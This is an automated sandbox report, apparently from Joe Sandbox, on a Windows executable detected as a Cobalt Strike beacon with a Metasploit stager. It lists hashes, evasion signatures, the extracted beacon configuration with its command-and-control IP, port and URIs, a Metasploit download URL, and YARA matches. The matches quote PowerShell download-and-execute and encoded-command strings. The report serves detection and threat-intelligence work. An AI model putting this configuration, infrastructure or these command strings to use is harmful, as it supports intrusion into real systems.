Edit tour

Windows Analysis Report
2HSalvXIJE.exe

Overview

General Information

Sample name:	2HSalvXIJE.exe renamed because original name is a hash value
Original sample name:	4B3D1C48C04C6187BA4FF2B1A55AB27D.exe
Analysis ID:	1540350
MD5:	4b3d1c48c04c6187ba4ff2b1a55ab27d
SHA1:	482dcc7ebafc84b260d3a8cfbc651caed407515a
SHA256:	08304b4914cf147f9422b7a887b04302cf54d74da74a03510ac6f617f7c39139
Tags:	CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

Yara detected Metasploit Payload

Yara detected Powershell download and execute

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found API chain indicative of debugger detection

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

2HSalvXIJE.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\2HSalvXIJE.exe" MD5: 4B3D1C48C04C6187BA4FF2B1A55AB27D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 7698, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "79.124.58.130,/en_US/all.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1158277545, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; msn OptimizedIE8;ENUS)\r\n", "Type": "Metasploit Download", "URL": "http://79.124.58.130/aiHK"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fea:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31062:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x317c7:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31af9:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a8b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31af9:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x310c5:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31256:$a7: could not run command (w/ token) because of its length of %d bytes! 0x3110b:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31149:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31b43:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x313b1:$a11: Could not open service control manager on %s: %d 0x318e3:$a12: %d is an x64 process (can't inject x86 content) 0x31913:$a13: %d is an x86 process (can't inject x64 content) 0x31c34:$a14: Failed to impersonate logged on user %d (%u) 0x3189c:$a15: could not create remote thread in %d: %d 0x3117f:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3184a:$a17: could not write to process memory: %d 0x313e2:$a18: Could not create service %s on %s: %d 0x3146b:$a19: Could not delete service %s on %s: %d 0x312d0:$a20: Could not open process token: %d (%u)
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd83:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x189b1:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19ce2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x40238:$loader_export: ReflectiveLoader 0x30fa7:$exportname: beacon.dll
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31b43:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31913:$x2: %d is an x86 process (can't inject x64 content) 0x31af9:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31bdd:$x4: Failed to impersonate token from %d (%u) 0x31c34:$x5: Failed to impersonate logged on user %d (%u) 0x30fea:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x19911:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 8B 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 71 F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF 50 0x18cb5:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
Process Memory Space: 2HSalvXIJE.exe PID: 7552	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2HSalvXIJE.exe PID: 7552	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2HSalvXIJE.exe PID: 7552	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 2HSalvXIJE.exe PID: 7552	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2HSalvXIJE.exe PID: 7552	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2HSalvXIJE.exe PID: 7552	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x3029:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1000e:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x10086:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3806:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x107eb:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x3b2e:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x10b13:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3ac0:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3b2e:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x10aa5:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x10b13:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3104:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x100e9:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3295:$a7: could not run command (w/ token) because of its length of %d bytes! 0x1027a:$a7: could not run command (w/ token) because of its length of %d bytes! 0x314a:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1012f:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3188:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x1016d:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x3b78:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: 2HSalvXIJE.exe PID: 7552	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x8165:$loader_export: ReflectiveLoader 0x8184:$loader_export: ReflectiveLoader 0x1514a:$loader_export: ReflectiveLoader 0x15169:$loader_export: ReflectiveLoader 0x2e67:$exportname: beacon.dll 0x2ff0:$exportname: beacon.dll 0xfe4c:$exportname: beacon.dll 0xffd5:$exportname: beacon.dll
Process Memory Space: 2HSalvXIJE.exe PID: 7552	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x3b78:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x10b5d:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x3952:$x2: %d is an x86 process (can't inject x64 content) 0x10937:$x2: %d is an x86 process (can't inject x64 content) 0x3b2e:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x10b13:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3c12:$x4: Failed to impersonate token from %d (%u) 0x10bf7:$x4: Failed to impersonate token from %d (%u) 0x3c69:$x5: Failed to impersonate logged on user %d (%u) 0x10c4e:$x5: Failed to impersonate logged on user %d (%u) 0x3029:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1000e:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2HSalvXIJE.exe.3a90000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.2HSalvXIJE.exe.3a90000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.2HSalvXIJE.exe.3a90000.1.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
0.2.2HSalvXIJE.exe.3a90000.1.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.2HSalvXIJE.exe.3a90000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.2HSalvXIJE.exe.3a90000.1.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
0.2.2HSalvXIJE.exe.3a90000.1.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
0.2.2HSalvXIJE.exe.3a90000.1.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
0.2.2HSalvXIJE.exe.3a90000.1.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
0.2.2HSalvXIJE.exe.3a90000.1.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.2HSalvXIJE.exe.3a90000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
